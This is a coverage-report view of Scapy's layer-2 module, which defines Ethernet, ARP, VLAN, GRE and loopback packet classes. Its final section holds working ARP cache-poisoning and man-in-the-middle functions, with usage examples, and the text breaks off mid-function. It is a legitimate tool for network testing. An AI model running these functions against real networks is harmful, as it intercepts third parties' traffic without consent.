Coverage for /pythoncovmergedfiles/medio/medio/usr/local/lib/python3.8/site-packages/scapy/layers/l2.py: 47%
Shortcuts on this page
r m x toggle line displays
j k next/prev highlighted chunk
0 (zero) top of page
1 (one) first highlighted chunk
Shortcuts on this page
r m x toggle line displays
j k next/prev highlighted chunk
0 (zero) top of page
1 (one) first highlighted chunk
1# SPDX-License-Identifier: GPL-2.0-only
2# This file is part of Scapy
3# See https://scapy.net/ for more information
4# Copyright (C) Philippe Biondi <phil@secdev.org>
6"""
7Classes and functions for layer 2 protocols.
8"""
10import itertools
11import socket
12import struct
13import time
15from scapy.ansmachine import AnsweringMachine
16from scapy.arch import get_if_addr, get_if_hwaddr
17from scapy.base_classes import Gen, Net
18from scapy.compat import chb, orb
19from scapy.config import conf
20from scapy import consts
21from scapy.data import ARPHDR_ETHER, ARPHDR_LOOPBACK, ARPHDR_METRICOM, \
22 DLT_ETHERNET_MPACKET, DLT_LINUX_IRDA, DLT_LINUX_SLL, DLT_LINUX_SLL2, \
23 DLT_LOOP, DLT_NULL, ETHER_ANY, ETHER_BROADCAST, ETHER_TYPES, ETH_P_ARP, ETH_P_MACSEC
24from scapy.error import warning, ScapyNoDstMacException, log_runtime
25from scapy.fields import (
26 BCDFloatField,
27 BitField,
28 ByteEnumField,
29 ByteField,
30 ConditionalField,
31 FCSField,
32 FieldLenField,
33 IP6Field,
34 IPField,
35 IntEnumField,
36 IntField,
37 LenField,
38 MACField,
39 MultipleTypeField,
40 OUIField,
41 ShortEnumField,
42 ShortField,
43 SourceIP6Field,
44 SourceIPField,
45 StrFixedLenField,
46 StrLenField,
47 ThreeBytesField,
48 XByteField,
49 XIntField,
50 XShortEnumField,
51 XShortField,
52)
53from scapy.interfaces import _GlobInterfaceType, resolve_iface
54from scapy.packet import bind_layers, Packet
55from scapy.plist import (
56 PacketList,
57 QueryAnswer,
58 SndRcvList,
59 _PacketList,
60)
61from scapy.sendrecv import sendp, srp, srp1, srploop
62from scapy.utils import checksum, hexdump, hexstr, inet_ntoa, inet_aton, \
63 mac2str, valid_mac, valid_net, valid_net6
65# Typing imports
66from typing import (
67 Any,
68 Callable,
69 Dict,
70 Iterable,
71 List,
72 Optional,
73 Tuple,
74 Type,
75 Union,
76 cast,
77)
78from scapy.interfaces import NetworkInterface
81if conf.route is None:
82 # unused import, only to initialize conf.route
83 import scapy.route # noqa: F401
86# type definitions
87_ResolverCallable = Callable[[Packet, Packet], Optional[str]]
89#################
90# Tools #
91#################
94class Neighbor:
95 def __init__(self):
96 # type: () -> None
97 self.resolvers = {} # type: Dict[Tuple[Type[Packet], Type[Packet]], _ResolverCallable] # noqa: E501
99 def register_l3(self, l2, l3, resolve_method):
100 # type: (Type[Packet], Type[Packet], _ResolverCallable) -> None
101 self.resolvers[l2, l3] = resolve_method
103 def resolve(self, l2inst, l3inst):
104 # type: (Packet, Packet) -> Optional[str]
105 k = l2inst.__class__, l3inst.__class__
106 if k in self.resolvers:
107 return self.resolvers[k](l2inst, l3inst)
108 return None
110 def __repr__(self):
111 # type: () -> str
112 return "\n".join("%-15s -> %-15s" % (l2.__name__, l3.__name__) for l2, l3 in self.resolvers) # noqa: E501
115conf.neighbor = Neighbor()
117# cache entries expire after 120s
118_arp_cache = conf.netcache.new_cache("arp_cache", 120)
121@conf.commands.register
122def getmacbyip(ip, chainCC=0):
123 # type: (str, int) -> Optional[str]
124 """Return MAC address corresponding to a given IP address"""
125 if isinstance(ip, Net):
126 ip = next(iter(ip))
127 ip = inet_ntoa(inet_aton(ip or "0.0.0.0"))
128 tmp = [orb(e) for e in inet_aton(ip)]
129 if (tmp[0] & 0xf0) == 0xe0: # mcast @
130 return "01:00:5e:%.2x:%.2x:%.2x" % (tmp[1] & 0x7f, tmp[2], tmp[3])
131 iff, _, gw = conf.route.route(ip)
132 if (iff == conf.loopback_name) or (ip in conf.route.get_if_bcast(iff)):
133 return "ff:ff:ff:ff:ff:ff"
134 if gw != "0.0.0.0":
135 ip = gw
137 mac = _arp_cache.get(ip)
138 if mac:
139 return mac
141 try:
142 res = srp1(Ether(dst=ETHER_BROADCAST) / ARP(op="who-has", pdst=ip),
143 type=ETH_P_ARP,
144 iface=iff,
145 timeout=2,
146 verbose=0,
147 chainCC=chainCC,
148 nofilter=1)
149 except Exception as ex:
150 warning("getmacbyip failed on %s", ex)
151 return None
152 if res is not None:
153 mac = res.payload.hwsrc
154 _arp_cache[ip] = mac
155 return mac
156 return None
159# Fields
161class DestMACField(MACField):
162 def __init__(self, name):
163 # type: (str) -> None
164 MACField.__init__(self, name, None)
166 def i2h(self, pkt, x):
167 # type: (Optional[Packet], Optional[str]) -> str
168 if x is None and pkt is not None:
169 x = "None (resolved on build)"
170 return super(DestMACField, self).i2h(pkt, x)
172 def i2m(self, pkt, x):
173 # type: (Optional[Packet], Optional[str]) -> bytes
174 if x is None and pkt is not None:
175 try:
176 x = conf.neighbor.resolve(pkt, pkt.payload)
177 except socket.error:
178 pass
179 if x is None:
180 if conf.raise_no_dst_mac:
181 raise ScapyNoDstMacException()
182 else:
183 x = "ff:ff:ff:ff:ff:ff"
184 warning(
185 "MAC address to reach destination not found. Using broadcast."
186 )
187 return super(DestMACField, self).i2m(pkt, x)
190class SourceMACField(MACField):
191 __slots__ = ["getif"]
193 def __init__(self, name, getif=None):
194 # type: (str, Optional[Any]) -> None
195 MACField.__init__(self, name, None)
196 self.getif = (lambda pkt: pkt.route()[0]) if getif is None else getif
198 def i2h(self, pkt, x):
199 # type: (Optional[Packet], Optional[str]) -> str
200 if x is None:
201 iff = self.getif(pkt)
202 if iff is None:
203 iff = conf.iface
204 if iff:
205 x = resolve_iface(iff).mac
206 if x is None:
207 x = "00:00:00:00:00:00"
208 return super(SourceMACField, self).i2h(pkt, x)
210 def i2m(self, pkt, x):
211 # type: (Optional[Packet], Optional[Any]) -> bytes
212 return super(SourceMACField, self).i2m(pkt, self.i2h(pkt, x))
215# Layers
217HARDWARE_TYPES = {
218 1: "Ethernet (10Mb)",
219 2: "Ethernet (3Mb)",
220 3: "AX.25",
221 4: "Proteon ProNET Token Ring",
222 5: "Chaos",
223 6: "IEEE 802 Networks",
224 7: "ARCNET",
225 8: "Hyperchannel",
226 9: "Lanstar",
227 10: "Autonet Short Address",
228 11: "LocalTalk",
229 12: "LocalNet",
230 13: "Ultra link",
231 14: "SMDS",
232 15: "Frame relay",
233 16: "ATM",
234 17: "HDLC",
235 18: "Fibre Channel",
236 19: "ATM",
237 20: "Serial Line",
238 21: "ATM",
239}
241ETHER_TYPES[0x88a8] = '802_1AD'
242ETHER_TYPES[0x88e7] = '802_1AH'
243ETHER_TYPES[ETH_P_MACSEC] = '802_1AE'
246class Ether(Packet):
247 name = "Ethernet"
248 fields_desc = [DestMACField("dst"),
249 SourceMACField("src"),
250 XShortEnumField("type", 0x9000, ETHER_TYPES)]
251 __slots__ = ["_defrag_pos"]
253 def hashret(self):
254 # type: () -> bytes
255 return struct.pack("H", self.type) + self.payload.hashret()
257 def answers(self, other):
258 # type: (Packet) -> int
259 if isinstance(other, Ether):
260 if self.type == other.type:
261 return self.payload.answers(other.payload)
262 return 0
264 def mysummary(self):
265 # type: () -> str
266 return self.sprintf("%src% > %dst% (%type%)")
268 @classmethod
269 def dispatch_hook(cls, _pkt=None, *args, **kargs):
270 # type: (Optional[bytes], *Any, **Any) -> Type[Packet]
271 if _pkt and len(_pkt) >= 14:
272 if struct.unpack("!H", _pkt[12:14])[0] <= 1500:
273 return Dot3
274 return cls
277class Dot3(Packet):
278 name = "802.3"
279 fields_desc = [DestMACField("dst"),
280 SourceMACField("src"),
281 LenField("len", None, "H")]
283 def extract_padding(self, s):
284 # type: (bytes) -> Tuple[bytes, bytes]
285 tmp_len = self.len
286 return s[:tmp_len], s[tmp_len:]
288 def answers(self, other):
289 # type: (Packet) -> int
290 if isinstance(other, Dot3):
291 return self.payload.answers(other.payload)
292 return 0
294 def mysummary(self):
295 # type: () -> str
296 return "802.3 %s > %s" % (self.src, self.dst)
298 @classmethod
299 def dispatch_hook(cls, _pkt=None, *args, **kargs):
300 # type: (Optional[Any], *Any, **Any) -> Type[Packet]
301 if _pkt and len(_pkt) >= 14:
302 if struct.unpack("!H", _pkt[12:14])[0] > 1500:
303 return Ether
304 return cls
307class LLC(Packet):
308 name = "LLC"
309 fields_desc = [XByteField("dsap", 0x00),
310 XByteField("ssap", 0x00),
311 ByteField("ctrl", 0)]
314def l2_register_l3(l2: Packet, l3: Packet) -> Optional[str]:
315 """
316 Delegates resolving the default L2 destination address to the payload of L3.
317 """
318 neighbor = conf.neighbor # type: Neighbor
319 return neighbor.resolve(l2, l3.payload)
322conf.neighbor.register_l3(Ether, LLC, l2_register_l3)
323conf.neighbor.register_l3(Dot3, LLC, l2_register_l3)
326COOKED_LINUX_PACKET_TYPES = {
327 0: "unicast",
328 1: "broadcast",
329 2: "multicast",
330 3: "unicast-to-another-host",
331 4: "sent-by-us"
332}
335class CookedLinux(Packet):
336 # Documentation: http://www.tcpdump.org/linktypes/LINKTYPE_LINUX_SLL.html
337 name = "cooked linux"
338 # from wireshark's database
339 fields_desc = [ShortEnumField("pkttype", 0, COOKED_LINUX_PACKET_TYPES),
340 XShortField("lladdrtype", 512),
341 ShortField("lladdrlen", 0),
342 StrFixedLenField("src", b"", 8),
343 XShortEnumField("proto", 0x800, ETHER_TYPES)]
346class CookedLinuxV2(CookedLinux):
347 # Documentation: https://www.tcpdump.org/linktypes/LINKTYPE_LINUX_SLL2.html
348 name = "cooked linux v2"
349 fields_desc = [XShortEnumField("proto", 0x800, ETHER_TYPES),
350 ShortField("reserved", 0),
351 IntField("ifindex", 0),
352 XShortField("lladdrtype", 512),
353 ByteEnumField("pkttype", 0, COOKED_LINUX_PACKET_TYPES),
354 ByteField("lladdrlen", 0),
355 StrFixedLenField("src", b"", 8)]
358class MPacketPreamble(Packet):
359 # IEEE 802.3br Figure 99-3
360 name = "MPacket Preamble"
361 fields_desc = [StrFixedLenField("preamble", b"", length=8),
362 FCSField("fcs", 0, fmt="!I")]
365class SNAP(Packet):
366 name = "SNAP"
367 fields_desc = [OUIField("OUI", 0x000000),
368 XShortEnumField("code", 0x000, ETHER_TYPES)]
371conf.neighbor.register_l3(Dot3, SNAP, l2_register_l3)
374class Dot1Q(Packet):
375 name = "802.1Q"
376 aliastypes = [Ether]
377 fields_desc = [BitField("prio", 0, 3),
378 BitField("dei", 0, 1),
379 BitField("vlan", 1, 12),
380 XShortEnumField("type", 0x0000, ETHER_TYPES)]
381 deprecated_fields = {
382 "id": ("dei", "2.5.0"),
383 }
385 def answers(self, other):
386 # type: (Packet) -> int
387 if isinstance(other, Dot1Q):
388 if ((self.type == other.type) and
389 (self.vlan == other.vlan)):
390 return self.payload.answers(other.payload)
391 else:
392 return self.payload.answers(other)
393 return 0
395 def default_payload_class(self, pay):
396 # type: (bytes) -> Type[Packet]
397 if self.type <= 1500:
398 return LLC
399 return conf.raw_layer
401 def extract_padding(self, s):
402 # type: (bytes) -> Tuple[bytes, Optional[bytes]]
403 if self.type <= 1500:
404 return s[:self.type], s[self.type:]
405 return s, None
407 def mysummary(self):
408 # type: () -> str
409 if isinstance(self.underlayer, Ether):
410 return self.underlayer.sprintf("802.1q %Ether.src% > %Ether.dst% (%Dot1Q.type%) vlan %Dot1Q.vlan%") # noqa: E501
411 else:
412 return self.sprintf("802.1q (%Dot1Q.type%) vlan %Dot1Q.vlan%")
415conf.neighbor.register_l3(Ether, Dot1Q, l2_register_l3)
418class STP(Packet):
419 name = "Spanning Tree Protocol"
420 fields_desc = [ShortField("proto", 0),
421 ByteField("version", 0),
422 ByteField("bpdutype", 0),
423 ByteField("bpduflags", 0),
424 ShortField("rootid", 0),
425 MACField("rootmac", ETHER_ANY),
426 IntField("pathcost", 0),
427 ShortField("bridgeid", 0),
428 MACField("bridgemac", ETHER_ANY),
429 ShortField("portid", 0),
430 BCDFloatField("age", 1),
431 BCDFloatField("maxage", 20),
432 BCDFloatField("hellotime", 2),
433 BCDFloatField("fwddelay", 15)]
436class ARP(Packet):
437 name = "ARP"
438 fields_desc = [
439 XShortEnumField("hwtype", 0x0001, HARDWARE_TYPES),
440 XShortEnumField("ptype", 0x0800, ETHER_TYPES),
441 FieldLenField("hwlen", None, fmt="B", length_of="hwsrc"),
442 FieldLenField("plen", None, fmt="B", length_of="psrc"),
443 ShortEnumField("op", 1, {
444 "who-has": 1,
445 "is-at": 2,
446 "RARP-req": 3,
447 "RARP-rep": 4,
448 "Dyn-RARP-req": 5,
449 "Dyn-RAR-rep": 6,
450 "Dyn-RARP-err": 7,
451 "InARP-req": 8,
452 "InARP-rep": 9
453 }),
454 MultipleTypeField(
455 [
456 (SourceMACField("hwsrc"),
457 (lambda pkt: pkt.hwtype == 1 and pkt.hwlen == 6,
458 lambda pkt, val: pkt.hwtype == 1 and (
459 pkt.hwlen == 6 or (pkt.hwlen is None and
460 (val is None or len(val) == 6 or
461 valid_mac(val)))
462 ))),
463 ],
464 StrFixedLenField("hwsrc", None, length_from=lambda pkt: pkt.hwlen),
465 ),
466 MultipleTypeField(
467 [
468 (SourceIPField("psrc", "pdst"),
469 (lambda pkt: pkt.ptype == 0x0800 and pkt.plen == 4,
470 lambda pkt, val: pkt.ptype == 0x0800 and (
471 pkt.plen == 4 or (pkt.plen is None and
472 (val is None or valid_net(val)))
473 ))),
474 (SourceIP6Field("psrc", "pdst"),
475 (lambda pkt: pkt.ptype == 0x86dd and pkt.plen == 16,
476 lambda pkt, val: pkt.ptype == 0x86dd and (
477 pkt.plen == 16 or (pkt.plen is None and
478 (val is None or valid_net6(val)))
479 ))),
480 ],
481 StrFixedLenField("psrc", None, length_from=lambda pkt: pkt.plen),
482 ),
483 MultipleTypeField(
484 [
485 (MACField("hwdst", ETHER_ANY),
486 (lambda pkt: pkt.hwtype == 1 and pkt.hwlen == 6,
487 lambda pkt, val: pkt.hwtype == 1 and (
488 pkt.hwlen == 6 or (pkt.hwlen is None and
489 (val is None or len(val) == 6 or
490 valid_mac(val)))
491 ))),
492 ],
493 StrFixedLenField("hwdst", None, length_from=lambda pkt: pkt.hwlen),
494 ),
495 MultipleTypeField(
496 [
497 (IPField("pdst", "0.0.0.0"),
498 (lambda pkt: pkt.ptype == 0x0800 and pkt.plen == 4,
499 lambda pkt, val: pkt.ptype == 0x0800 and (
500 pkt.plen == 4 or (pkt.plen is None and
501 (val is None or valid_net(val)))
502 ))),
503 (IP6Field("pdst", "::"),
504 (lambda pkt: pkt.ptype == 0x86dd and pkt.plen == 16,
505 lambda pkt, val: pkt.ptype == 0x86dd and (
506 pkt.plen == 16 or (pkt.plen is None and
507 (val is None or valid_net6(val)))
508 ))),
509 ],
510 StrFixedLenField("pdst", None, length_from=lambda pkt: pkt.plen),
511 ),
512 ]
514 def hashret(self):
515 # type: () -> bytes
516 return struct.pack(">HHH", self.hwtype, self.ptype,
517 ((self.op + 1) // 2)) + self.payload.hashret()
519 def answers(self, other):
520 # type: (Packet) -> int
521 if not isinstance(other, ARP):
522 return False
523 if self.op != other.op + 1:
524 return False
525 # We use a loose comparison on psrc vs pdst to catch answers
526 # with ARP leaks
527 self_psrc = self.get_field('psrc').i2m(self, self.psrc) # type: bytes
528 other_pdst = other.get_field('pdst').i2m(other, other.pdst) \
529 # type: bytes
530 return self_psrc[:len(other_pdst)] == other_pdst[:len(self_psrc)]
532 def route(self):
533 # type: () -> Tuple[Optional[str], Optional[str], Optional[str]]
534 fld, dst = cast(Tuple[MultipleTypeField, str],
535 self.getfield_and_val("pdst"))
536 fld_inner, dst = fld._find_fld_pkt_val(self, dst)
537 if isinstance(dst, Gen):
538 dst = next(iter(dst))
539 if isinstance(fld_inner, IP6Field):
540 return conf.route6.route(dst)
541 elif isinstance(fld_inner, IPField):
542 return conf.route.route(dst)
543 else:
544 return None, None, None
546 def extract_padding(self, s):
547 # type: (bytes) -> Tuple[bytes, bytes]
548 return b"", s
550 def mysummary(self):
551 # type: () -> str
552 if self.op == 1:
553 return self.sprintf("ARP who has %pdst% says %psrc%")
554 if self.op == 2:
555 return self.sprintf("ARP is at %hwsrc% says %psrc%")
556 return self.sprintf("ARP %op% %psrc% > %pdst%")
559def l2_register_l3_arp(l2: Packet, l3: Packet) -> Optional[str]:
560 """
561 Resolves the default L2 destination address when ARP is used.
562 """
563 if l3.op == 1: # who-has
564 return "ff:ff:ff:ff:ff:ff"
565 elif l3.op == 2: # is-at
566 log_runtime.warning(
567 "You should be providing the Ethernet destination MAC address when "
568 "sending an is-at ARP."
569 )
570 # Need ARP request to send ARP request...
571 plen = l3.get_field("pdst").i2len(l3, l3.pdst)
572 if plen == 4:
573 return getmacbyip(l3.pdst)
574 elif plen == 32:
575 from scapy.layers.inet6 import getmacbyip6
576 return getmacbyip6(l3.pdst)
577 # Can't even do that
578 log_runtime.warning(
579 "You should be providing the Ethernet destination mac when sending this "
580 "kind of ARP packets."
581 )
582 return None
585conf.neighbor.register_l3(Ether, ARP, l2_register_l3_arp)
588class GRErouting(Packet):
589 name = "GRE routing information"
590 fields_desc = [ShortField("address_family", 0),
591 ByteField("SRE_offset", 0),
592 FieldLenField("SRE_len", None, "routing_info", "B"),
593 StrLenField("routing_info", b"",
594 length_from=lambda pkt: pkt.SRE_len),
595 ]
598class GRE(Packet):
599 name = "GRE"
600 deprecated_fields = {
601 "seqence_number": ("sequence_number", "2.4.4"),
602 }
603 fields_desc = [BitField("chksum_present", 0, 1),
604 BitField("routing_present", 0, 1),
605 BitField("key_present", 0, 1),
606 BitField("seqnum_present", 0, 1),
607 BitField("strict_route_source", 0, 1),
608 BitField("recursion_control", 0, 3),
609 BitField("flags", 0, 5),
610 BitField("version", 0, 3),
611 XShortEnumField("proto", 0x0000, ETHER_TYPES),
612 ConditionalField(XShortField("chksum", None), lambda pkt:pkt.chksum_present == 1 or pkt.routing_present == 1), # noqa: E501
613 ConditionalField(XShortField("offset", None), lambda pkt:pkt.chksum_present == 1 or pkt.routing_present == 1), # noqa: E501
614 ConditionalField(XIntField("key", None), lambda pkt:pkt.key_present == 1), # noqa: E501
615 ConditionalField(XIntField("sequence_number", None), lambda pkt:pkt.seqnum_present == 1), # noqa: E501
616 ]
618 @classmethod
619 def dispatch_hook(cls, _pkt=None, *args, **kargs):
620 # type: (Optional[Any], *Any, **Any) -> Type[Packet]
621 if _pkt and struct.unpack("!H", _pkt[2:4])[0] == 0x880b:
622 return GRE_PPTP
623 return cls
625 def post_build(self, p, pay):
626 # type: (bytes, bytes) -> bytes
627 p += pay
628 if self.chksum_present and self.chksum is None:
629 c = checksum(p)
630 p = p[:4] + chb((c >> 8) & 0xff) + chb(c & 0xff) + p[6:]
631 return p
634class GRE_PPTP(GRE):
636 """
637 Enhanced GRE header used with PPTP
638 RFC 2637
639 """
641 name = "GRE PPTP"
642 deprecated_fields = {
643 "seqence_number": ("sequence_number", "2.4.4"),
644 }
645 fields_desc = [BitField("chksum_present", 0, 1),
646 BitField("routing_present", 0, 1),
647 BitField("key_present", 1, 1),
648 BitField("seqnum_present", 0, 1),
649 BitField("strict_route_source", 0, 1),
650 BitField("recursion_control", 0, 3),
651 BitField("acknum_present", 0, 1),
652 BitField("flags", 0, 4),
653 BitField("version", 1, 3),
654 XShortEnumField("proto", 0x880b, ETHER_TYPES),
655 ShortField("payload_len", None),
656 ShortField("call_id", None),
657 ConditionalField(XIntField("sequence_number", None), lambda pkt: pkt.seqnum_present == 1), # noqa: E501
658 ConditionalField(XIntField("ack_number", None), lambda pkt: pkt.acknum_present == 1)] # noqa: E501
660 def post_build(self, p, pay):
661 # type: (bytes, bytes) -> bytes
662 p += pay
663 if self.payload_len is None:
664 pay_len = len(pay)
665 p = p[:4] + chb((pay_len >> 8) & 0xff) + chb(pay_len & 0xff) + p[6:] # noqa: E501
666 return p
669# *BSD loopback layer
671class LoIntEnumField(IntEnumField):
673 def m2i(self, pkt, x):
674 # type: (Optional[Packet], int) -> int
675 return x >> 24
677 def i2m(self, pkt, x):
678 # type: (Optional[Packet], Union[List[int], int, None]) -> int
679 return cast(int, x) << 24
682# https://github.com/wireshark/wireshark/blob/fe219637a6748130266a0b0278166046e60a2d68/epan/dissectors/packet-null.c
683# https://www.wireshark.org/docs/wsar_html/epan/aftypes_8h.html
684LOOPBACK_TYPES = {0x2: "IPv4",
685 0x7: "OSI",
686 0x10: "Appletalk",
687 0x17: "Netware IPX/SPX",
688 0x18: "IPv6", 0x1c: "IPv6", 0x1e: "IPv6"}
691# On OpenBSD, Loopback = LoopbackOpenBSD. On other platforms, the 2 are available.
692# This is to be compatible with both tcpdump and tshark
694class Loopback(Packet):
695 r"""
696 \*BSD loopback layer
697 """
698 __slots__ = ["_defrag_pos"]
699 name = "Loopback"
700 if consts.OPENBSD:
701 fields_desc = [IntEnumField("type", 0x2, LOOPBACK_TYPES)]
702 else:
703 fields_desc = [LoIntEnumField("type", 0x2, LOOPBACK_TYPES)]
706if consts.OPENBSD:
707 LoopbackOpenBSD = Loopback
708else:
709 class LoopbackOpenBSD(Loopback):
710 name = "OpenBSD Loopback"
711 fields_desc = [IntEnumField("type", 0x2, LOOPBACK_TYPES)]
714class Dot1AD(Dot1Q):
715 name = '802_1AD'
718class Dot1AH(Packet):
719 name = "802_1AH"
720 fields_desc = [BitField("prio", 0, 3),
721 BitField("dei", 0, 1),
722 BitField("nca", 0, 1),
723 BitField("res1", 0, 1),
724 BitField("res2", 0, 2),
725 ThreeBytesField("isid", 0)]
727 def answers(self, other):
728 # type: (Packet) -> int
729 if isinstance(other, Dot1AH):
730 if self.isid == other.isid:
731 return self.payload.answers(other.payload)
732 return 0
734 def mysummary(self):
735 # type: () -> str
736 return self.sprintf("802.1ah (isid=%Dot1AH.isid%")
739conf.neighbor.register_l3(Ether, Dot1AH, l2_register_l3)
742bind_layers(Dot3, LLC)
743bind_layers(Ether, LLC, type=122)
744bind_layers(Ether, LLC, type=34928)
745bind_layers(Ether, Dot1Q, type=33024)
746bind_layers(Ether, Dot1AD, type=0x88a8)
747bind_layers(Ether, Dot1AH, type=0x88e7)
748bind_layers(Dot1AD, Dot1AD, type=0x88a8)
749bind_layers(Dot1AD, Dot1Q, type=0x8100)
750bind_layers(Dot1AD, Dot1AH, type=0x88e7)
751bind_layers(Dot1Q, Dot1AD, type=0x88a8)
752bind_layers(Dot1Q, Dot1AH, type=0x88e7)
753bind_layers(Dot1AH, Ether)
754bind_layers(Ether, Ether, type=1)
755bind_layers(Ether, ARP, type=2054)
756bind_layers(CookedLinux, LLC, proto=122)
757bind_layers(CookedLinux, Dot1Q, proto=33024)
758bind_layers(CookedLinux, Dot1AD, type=0x88a8)
759bind_layers(CookedLinux, Dot1AH, type=0x88e7)
760bind_layers(CookedLinux, Ether, proto=1)
761bind_layers(CookedLinux, ARP, proto=2054)
762bind_layers(MPacketPreamble, Ether)
763bind_layers(GRE, LLC, proto=122)
764bind_layers(GRE, Dot1Q, proto=33024)
765bind_layers(GRE, Dot1AD, type=0x88a8)
766bind_layers(GRE, Dot1AH, type=0x88e7)
767bind_layers(GRE, Ether, proto=0x6558)
768bind_layers(GRE, ARP, proto=2054)
769bind_layers(GRE, GRErouting, {"routing_present": 1})
770bind_layers(GRErouting, conf.raw_layer, {"address_family": 0, "SRE_len": 0})
771bind_layers(GRErouting, GRErouting)
772bind_layers(LLC, STP, dsap=66, ssap=66, ctrl=3)
773bind_layers(LLC, SNAP, dsap=170, ssap=170, ctrl=3)
774bind_layers(SNAP, Dot1Q, code=33024)
775bind_layers(SNAP, Dot1AD, type=0x88a8)
776bind_layers(SNAP, Dot1AH, type=0x88e7)
777bind_layers(SNAP, Ether, code=1)
778bind_layers(SNAP, ARP, code=2054)
779bind_layers(SNAP, STP, code=267)
781conf.l2types.register(ARPHDR_ETHER, Ether)
782conf.l2types.register_num2layer(ARPHDR_METRICOM, Ether)
783conf.l2types.register_num2layer(ARPHDR_LOOPBACK, Ether)
784conf.l2types.register_layer2num(ARPHDR_ETHER, Dot3)
785conf.l2types.register(DLT_LINUX_SLL, CookedLinux)
786conf.l2types.register(DLT_LINUX_SLL2, CookedLinuxV2)
787conf.l2types.register(DLT_ETHERNET_MPACKET, MPacketPreamble)
788conf.l2types.register_num2layer(DLT_LINUX_IRDA, CookedLinux)
789conf.l2types.register(DLT_NULL, Loopback)
790conf.l2types.register(DLT_LOOP, LoopbackOpenBSD)
792conf.l3types.register(ETH_P_ARP, ARP)
795# Techniques
798@conf.commands.register
799def arpcachepoison(
800 target, # type: Union[str, List[str]]
801 addresses, # type: Union[str, Tuple[str, str], List[Tuple[str, str]]]
802 broadcast=False, # type: bool
803 count=None, # type: Optional[int]
804 interval=15, # type: int
805 **kwargs, # type: Any
806):
807 # type: (...) -> None
808 """Poison targets' ARP cache
810 :param target: Can be an IP, subnet (string) or a list of IPs. This lists the IPs
811 or the subnet that will be poisoned.
812 :param addresses: Can be either a string, a tuple of a list of tuples.
813 If it's a string, it's the IP to advertise to the victim,
814 with the local interface's MAC. If it's a tuple,
815 it's ("IP", "MAC"). It it's a list, it's [("IP", "MAC")].
816 "IP" can be a subnet of course.
817 :param broadcast: Use broadcast ethernet
819 Examples for target "192.168.0.2"::
821 >>> arpcachepoison("192.168.0.2", "192.168.0.1")
822 >>> arpcachepoison("192.168.0.1/24", "192.168.0.1")
823 >>> arpcachepoison(["192.168.0.2", "192.168.0.3"], "192.168.0.1")
824 >>> arpcachepoison("192.168.0.2", ("192.168.0.1", get_if_hwaddr("virbr0")))
825 >>> arpcachepoison("192.168.0.2", [("192.168.0.1", get_if_hwaddr("virbr0"),
826 ... ("192.168.0.2", "aa:aa:aa:aa:aa:aa")])
828 """
829 if isinstance(target, str):
830 targets = Net(target) # type: Union[Net, List[str]]
831 str_target = target
832 else:
833 targets = target
834 str_target = target[0]
835 if isinstance(addresses, str):
836 couple_list = [(addresses, get_if_hwaddr(conf.route.route(str_target)[0]))]
837 elif isinstance(addresses, tuple):
838 couple_list = [addresses]
839 else:
840 couple_list = addresses
841 p: List[Packet] = [
842 Ether(src=y, dst="ff:ff:ff:ff:ff:ff" if broadcast else None) /
843 ARP(op="who-has", psrc=x, pdst=targets,
844 hwsrc=y, hwdst="00:00:00:00:00:00")
845 for x, y in couple_list
846 ]
847 if count is not None:
848 sendp(p, iface_hint=str_target, count=count, inter=interval, **kwargs)
849 return
850 try:
851 while True:
852 sendp(p, iface_hint=str_target, **kwargs)
853 time.sleep(interval)
854 except KeyboardInterrupt:
855 pass
858@conf.commands.register
859def arp_mitm(
860 ip1, # type: str
861 ip2, # type: str
862 mac1=None, # type: Optional[Union[str, List[str]]]
863 mac2=None, # type: Optional[Union[str, List[str]]]
864 broadcast=False, # type: bool
865 target_mac=None, # type: Optional[str]
866 iface=None, # type: Optional[_GlobInterfaceType]
867 inter=3, # type: int
868):
869 # type: (...) -> None
870 r"""ARP MitM: poison 2 target's ARP cache
872 :param ip1: IPv4 of the first machine
873 :param ip2: IPv4 of the second machine
874 :param mac1: MAC of the first machine (optional: will ARP otherwise)
875 :param mac2: MAC of the second machine (optional: will ARP otherwise)
876 :param broadcast: if True, will use broadcast mac for MitM by default
877 :param target_mac: MAC of the attacker (optional: default to the interface's one)
878 :param iface: the network interface. (optional: default, route for ip1)
880 Example usage::
882 $ sysctl net.ipv4.conf.virbr0.send_redirects=0 # virbr0 = interface
883 $ sysctl net.ipv4.ip_forward=1
884 $ sudo scapy
885 >>> arp_mitm("192.168.122.156", "192.168.122.17")
887 Alternative usages:
888 >>> arp_mitm("10.0.0.1", "10.1.1.0/21", iface="eth1")
889 >>> arp_mitm("10.0.0.1", "10.1.1.2",
890 ... target_mac="aa:aa:aa:aa:aa:aa",
891 ... mac2="00:1e:eb:bf:c1:ab")
893 .. warning::
894 If using a subnet, this will first perform an arping, unless broadcast is on!
896 Remember to change the sysctl settings back..
897 """
898 if not iface:
899 iface = conf.route.route(ip1)[0]
900 if not target_mac:
901 target_mac = get_if_hwaddr(iface)
903 def _tups(ip, mac):
904 # type: (str, Optional[Union[str, List[str]]]) -> Iterable[Tuple[str, str]]
905 if mac is None:
906 if broadcast:
907 # ip can be a Net/list/etc and will be iterated upon while sending
908 return [(ip, "ff:ff:ff:ff:ff:ff")]
909 return [(x.query.pdst, x.answer.hwsrc)
910 for x in arping(ip, verbose=0)[0]]
911 elif isinstance(mac, list):
912 return [(ip, x) for x in mac]
913 else:
914 return [(ip, mac)]
916 tup1 = _tups(ip1, mac1)
917 if not tup1:
918 raise OSError(f"Could not resolve {ip1}")
919 tup2 = _tups(ip2, mac2)
920 if not tup2:
921 raise OSError(f"Could not resolve {ip2}")
922 print(f"MITM on {iface}: %s <--> {target_mac} <--> %s" % (
923 [x[1] for x in tup1],
924 [x[1] for x in tup2],
925 ))
926 # We loop who-has requests
927 srploop(
928 list(itertools.chain(
929 (x
930 for ipa, maca in tup1
931 for ipb, _ in tup2
932 for x in
933 Ether(dst=maca, src=target_mac) /
934 ARP(op="who-has", psrc=ipb, pdst=ipa,
935 hwsrc=target_mac, hwdst="00:00:00:00:00:00")
936 ),
937 (x
938 for ipb, macb in tup2
939 for ipa, _ in tup1
940 for x in
941 Ether(dst=macb, src=target_mac) /
942 ARP(op="who-has", psrc=ipa, pdst=ipb,
943 hwsrc=target_mac, hwdst="00:00:00:00:00:00")
944 ),
945 )),
946 filter="arp and arp[7] = 2",
947 inter=inter,
948 iface=iface,
949 timeout=0.5,
950 verbose=1,
951 store=0,
952 )
953 print("Restoring...")
954 sendp(
955 list(itertools.chain(
956 (x
957 for ipa, maca in tup1
958 for ipb, macb in tup2
959 for x in
960 Ether(dst=maca, src=macb) /
961 ARP(op="who-has", psrc=ipb, pdst=ipa,
